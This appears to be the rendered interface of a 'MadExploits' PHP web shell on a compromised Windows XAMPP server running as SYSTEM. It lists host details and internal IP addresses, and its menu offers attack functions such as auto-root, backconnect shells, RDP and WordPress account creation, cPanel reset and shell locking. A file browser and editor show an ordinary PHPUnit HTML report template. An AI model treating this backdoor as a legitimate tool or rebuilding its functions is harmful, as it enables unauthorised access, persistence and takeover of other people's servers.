Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
php /
pear /
PHPUnit /
GUI /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
Gtk.php
22.21
KB
-rw-rw-rw-
HTML.php
8.64
KB
-rw-rw-rw-
HTML.tpl
6.52
KB
-rw-rw-rw-
SetupDecorator.php
7.36
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : HTML.tpl
<html> <head> <STYLE type="text/css"> body, td { background-color: lightgrey; } table.outline, outlineFailure { background-color: black; border-width: 1px; } td { padding: 2px; } th { text-align: left; color: white; background-color: black; } .success { background-color: lightgreen; } .failure { background-color: orange; } .info { padding: 2px; color: orange; } </STYLE> </head> <body> <form action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post" name="optionsForm"> <table align="center" class="outline" width="70%"> <tr> <th colspan="10"> Options </th> </tr> <tr> <td colspan="10"> <input type="checkbox" onClick="unCheckAll()" name="allChecked"> (un)check all show OK <input type="checkbox" name="showOK" <?php echo @$request['showOK']?'checked':''?>> <input type="submit" name="submitted" value="run tests"> </td> </tr> <?php foreach($suiteResults as $aResult): ?> <tr> <th colspan="10"> <input type="checkbox" name="<?php echo $aResult['name'] ?>" <?php echo @$request[$aResult['name']]?'checked':'' ?>> <?php echo $aResult['name'] ?> <?php if (isset($aResult['addInfo'])): ?> <font class="info"><?php echo @$aResult['addInfo'] ?></font> <?php endif ?> </th> </tr> <?php if(@$aResult['percent']): ?> <tr> <td colspan="10" nowrap="nowrap"> <table style="width:100%; padding:2px;" cellspacing="0" cellspan="0" cellpadding="0"> <tr> <td width="<?php echo $aResult['percent'] ?>%" class="success" align="center" style="padding:0;"> <?php echo $aResult['percent']?$aResult['percent'].'%':'' ?> </td> <td width="<?php echo 100-$aResult['percent'] ?>%" class="failure" align="center" style="padding:0;"> <?php echo (100-$aResult['percent'])?(100-$aResult['percent'].'%'):'' ?> </td> </tr> </table> </td> </tr> <?php endif ?> <?php if(@$aResult['counts']): ?> <tr> <td colspan="10"> <?php foreach($aResult['counts'] as $aCount=>$value): ?> <?php echo $aCount ?>s = <?php echo $value ?> <?php endforeach ?> </td> </tr> <?php endif ?> <?php if(isset($aResult['results']['failures']) && sizeof($aResult['results']['failures'])) foreach($aResult['results']['failures'] as $aFailure): ?> <tr> <td class="failure"><?php echo $aFailure['testName'] ?></td> <td class="failure"> <?php if(isset($aFailure['message']) && $aFailure['message']): ?> <?php echo $aFailure['message'] ?> <?php else: ?> <table class="outlineFailure"> <tr> <td>expected</td> <td><?php echo $aFailure['expected'] ?></td> </tr> <tr> <td>actual</td> <td><?php echo $aFailure['actual'] ?></td> </tr> </table> <?php endif ?> </td> </tr> <?php endforeach ?> <?php if(isset($aResult['results']['errors']) && sizeof($aResult['results']['errors'])) foreach($aResult['results']['errors'] as $aError): ?> <tr> <td class="failure"><?php echo $aError['testName'] ?></td> <td class="failure"> <?php echo $aError['message'] ?> </td> </tr> <?php endforeach ?> <?php if(isset($aResult['results']['passed']) && sizeof($aResult['results']['passed'])) foreach($aResult['results']['passed'] as $aPassed): ?> <tr> <td class="success"><?php echo $aPassed['testName'] ?></td> <td class="success"><b>OK</b></td> </tr> <?php endforeach ?> <?php endforeach ?> </table> </form> <script> var allSuiteNames = new Array(); <?php foreach($suiteResults as $aResult): ?> allSuiteNames[allSuiteNames.length] = "<?php echo $aResult['name'] ?>"; <?php endforeach ?> function unCheckAll() { _checked = document.optionsForm.allChecked.checked; for (i=0;i<allSuiteNames.length;i++) { document.optionsForm[allSuiteNames[i]].checked = _checked; } } </script> </body> </html>
Close